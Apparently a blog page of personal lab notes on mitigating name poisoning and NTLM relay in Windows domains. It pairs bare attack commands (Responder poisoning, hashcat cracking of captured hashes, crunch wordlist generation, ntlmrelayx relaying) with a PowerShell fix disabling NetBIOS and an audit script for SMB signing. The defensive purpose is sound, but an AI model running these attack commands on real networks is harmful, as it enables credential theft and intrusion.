Mitigating name poisoning & NTLM relay

responder -I eth0 -rdwv
hashcat -m 5600 TEST_hash.txt mywordlist.txt --force
crunch 20 20 -t CarolinaPanthers^^%% -o /root/Documents/mywordlist.txt
  • @ = lower case letters
  • , = upper case letters
  • % = numbers
  • ^ = symbols
nmap -p 445 --script smb2-security-mode <IP range>
pip3 install .
responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey | foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose }
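
To confirm the change above took effect, the following read-only check is an added example (not from the original notes). It reads back NetbiosOptions for every interface and reports whether the local SMB server requires signing, the host-side counterpart of the nmap smb2-security-mode scan. It assumes an elevated PowerShell session on the host being checked.

```powershell
# Added example: audit the settings this page's mitigation touches (read-only).
$regkey = "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces"

# NetbiosOptions: 0 = follow DHCP setting, 1 = enabled, 2 = disabled
$netbios = Get-ChildItem $regkey | ForEach-Object {
    $value = (Get-ItemProperty -Path $_.PSPath -Name NetbiosOptions `
              -ErrorAction SilentlyContinue).NetbiosOptions
    [pscustomobject]@{
        Interface      = $_.PSChildName
        NetbiosOptions = $value
        Disabled       = ($value -eq 2)
    }
}
$netbios | Format-Table -AutoSize

# Interfaces where NetBIOS over TCP/IP can still answer name queries
$stillEnabled = @($netbios | Where-Object { -not $_.Disabled })
if ($stillEnabled.Count -gt 0) {
    Write-Warning "$($stillEnabled.Count) interface(s) do not have NetbiosOptions = 2"
}

# A host that does not require SMB signing accepts relayed NTLM authentication
$smb = Get-SmbServerConfiguration
[pscustomobject]@{
    EnableSecuritySignature  = $smb.EnableSecuritySignature
    RequireSecuritySignature = $smb.RequireSecuritySignature
} | Format-List

if (-not $smb.RequireSecuritySignature) {
    Write-Warning "SMB signing is not required on this host"
}
```

New network adapters get their own subkey under Interfaces, so rerun the check after adding or replacing an adapter.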

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.